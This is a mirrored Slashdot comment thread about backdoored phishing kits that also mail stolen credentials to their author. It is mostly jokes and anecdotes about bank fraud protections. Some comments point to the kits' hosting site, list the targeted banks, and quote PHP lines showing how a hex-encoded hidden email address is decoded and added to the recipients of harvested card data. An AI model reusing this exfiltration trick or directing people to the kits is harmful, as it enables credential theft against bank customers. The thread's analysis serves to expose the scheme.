Slashdot Mirror
Phishing Group Caught Stealing From Other Phishers
An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them.
Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."
But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
The real "Libtards" are the Libertarians!
Hey, it's open source. Information wants to be free. It's all about sharing. Why shouldn't the developer of the phishing kit get some reward from the organization that profits from repackaging his code?
If they reall wanted to do it right, they could just pool all their resources and split the rewards. They could even invite others to join in, with a BotNet@Home project. Lend your computer to the BotNet, and get a prorated share of the take from stolen credit cards credited to your PayPal account.
...phishers phish phishers... Say that five times fast.
Except they are actually double feeding off innocent people.... some poor chap's info gets stolen by both the guy who deployed the phishing kit and the guy who wrote it.... which means its probably at least twice as likely to get used for fraud.
Phish from a man and you take advantage of him for a day.
Give a man a phishing kit and you take advantage of him for a lifetime.
(of course by "man" we mean spotty-faced script kiddie, and by "lifetime" we mean until he wipes his harddisk, but proverbs are meant to be pithy and brief, not accurate.)
Soylent Green is peoplicious!
they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?
I work for the Department of Redundancy Department.
Here's his site: http://thebadboys.org/Brain/
.. you just can't trust malware anymore!
Really though, this is nothing new. IIRC, some builds of Sub7 had a reverse backdoor (not covered in the wiki article), as well as a master password that let the Sub7 crew take over a server (covered by the wiki article), and some builds even included hard drive killer when the master password was in use.
What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?
It reminds me of the ol' days on instant messaging when people would pass around a supposed 'Nuke' program that would allow them to reboot people's computers, only to discover that their own computer crashed soon after.
Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".
The grass is always greener on the other side of the light cone.
I wait until I am at work to read those emails, I'm not going to risk my own computers.
However, Google is your friend. Within 30 seconds of looking over the Netcraft article for helpfully unique strings, I found it. And went looking with lynx
They've got ready-rolled scams for abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc,co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com - and in some cases, they have more than one for particular organisations.
Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?
Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
Isn't it trivial for a government agency like the FBI or Treasury to track payments charged to any kind of electronic banking back to the recipient? Wouldn't an investigation "following the money" ultimately lead you to either the thief or at least greatly disrupt his activities? At a minimum it would expose the people that made their transactions work (banks, hosting companies, other otherwise "normal" business people).
A couple of decent RICO prosecutions and you would drive this stuff out of the United States and greatly reduce the scale of it.
But it never happens, and I can only think that somehow the government has somehow turned these people into some espionage rabbit hole and high level prosecutions would disrupt intelligence gathering. Because there is little reason the government couldn't do something about it if they wanted to.
Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source. Then everyone receiving this spam can provide so many bad account numbers that phishing is very difficult to do without drawing attention to yourself.
It's amazing how many large websites are so vulnerable to even basic attacks. SQL Injection is still rampant (a simple well devised Google search can show you that) and many corporations leave credit card numbers unencrypted. Somebody with basic knowledge of SQL could attack a large amount of organizations without any trouble. I've seen this happen to too many people for me to ever trust important information on smaller sites.
In the old days, if thieves stole from thieves, it meant the first thief was deprived of the stolen goods. This lead to conflict. However, with information like this, all it means is that *two* thieves have the same info.
hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so whats the problem?
There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. If, for example, my mother-in-law from Mr. BadGuy Phisher gets an email offering (of all things) heavily discounted embroidery pattern files for her embroidery machine. She thinks he really has such files for sale, she actually does want the product, so she provides her real CC# and not the false one. Now, this is a woman who is keenly aware of the potential for credit card fraud and identity theft. I have seen her save all of her receipts and manual charge slips in a shopping bag so her husband can burn them out in the shop. She is convinced that Bad Men are rooting through trash to collect CC's and banking info. She is convinced that these Bad Men are somehow able to access her account based on the string of numbers that appear on the receipt when she uses her debit card.
Yet, despite this paranoia, she still buys hordes of knick-knacks, limited edition "collectibles", sewing supplies and such on EBay. Paypal being too scary for her, she uses her CC to pay for all of that. Try as I might, I can't seem to persuade her that a person in CA selling cutesy crocheted animal sweaters could be a Bad Man just as easily as some person rooting through her trash. As for email based scams; well, I set up her email client to reject anyone not already in her address book and have trained her in the habit of sending the initial email to them, rather than waiting until she gets one. As a major side benefit for me, it has drastically cut down the number of "cute", "humorous" or "inspirational" forwards she sends me.
*The bar to appear safe and legit enough for some users can be staggeringly low. Lets face it, there are always going to be some stupid people around.
I need a wheelchair van for my son. Help me get the word out. https://www.gofundme.com/wheelchair-van-for-jj
what's the world come to when you can't trust someone selling phishing software!
If you mod me down, I will become more powerful than you can imagine....
This is pretty much the correct usage.
From Wikipedia:
In hacker culture, a script kiddie (occasionally script bunny, skidie, script kitty, script-running juvenile (SRJ), or similar) is a derogatory term used for an inexperienced malicious cracker who uses programs developed by others to attack computer systems, and deface websites. It is generally assumed that script kiddies are kids who lack the ability to write sophisticated hacking programs on their own,[1] and that their objective is to try to impress their friends or gain credit in underground cracker communities.
And that's exactly what's happening.
One of my ATM cards has 2 different pin numbers. If I use the alternative one, the transaction is completed normally (so no one on the spot gets wiser), but the institution will flag it and notify the police at once, providing my identity and location. I have to pay a little extra for eat (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have this since 1996, and I'm happy to say I never needed.
So yes, the banks know this kind of thing can be done. I wonder why other institutions don't do it or even why this is not mandatory for all cards.
I really don't mind the extra US$ 3/month for this service.
morcego
It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.
Looking at the code more carefully you'll see..
details.php includes this in the phishing page form:
logon.php has these lines of code:
$d="details.php";
$erorr=file_get_contents($d);
$IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));
and Mr-Brain.php has this:
$send="al-brain@hotmail.fr,albrain08@yahoo.fr";
$str=array($send, $IP);
foreach ($str as $send)
mail($send,$subject,$message,$headers);
Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.
The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Looking at the larger picture, I want as small amount of fraud as possible because the cost of goods will be cheaper. Somebody has to recoup that $4000 or $8000 in your example, but what happens, everyone pays for fraud, but spread out over every purchase made, it is probably lower than the sales tax you pay on each individual transaction.
For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year. You'd also be amazed at the businesses (big box stores and little local stores) that will give you a discount for cash if you ask.
Exactly, in the chat rooms the criminals are far more worried about each other than the forces of law and order. OK they are concerned that the person might be from a security company (our guys) or a police officer. But they are rather more angry about 'rippers' -criminals who take the money but never deliver the goods or take goods and don't pay for them.
In the shadowcrew organization about a third of the management team was occupied as enforcers. In fact that is how they got caught, they ended up in a turf war and someone turned them in to police.
As in all criminal organizations the guys at the bottom get chicken feed. All the money flows up the pyramid, just like the Sopranos. A street drug dealer is likely to be in prison of dead in two to three years on average and makes less than minimum wage. The typical botnet herder makes less than they would flipping burgers. All the money flows up.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
There is a new fad around criminals in my country that is called "flash kidnapping" (loose translation). They grab you, put a gun in your head, and drive you around to several ATM machines.
morcego
Just do what I did, open up a bunch of cards, bury yourself, get bad credit. You can't open up accounts if your credit sucks. heh
Bullish Machine Tzar
Citibank has this feature. They call it "Virtual Account Numbers."
Tsunami -- You can't bring a good wave down!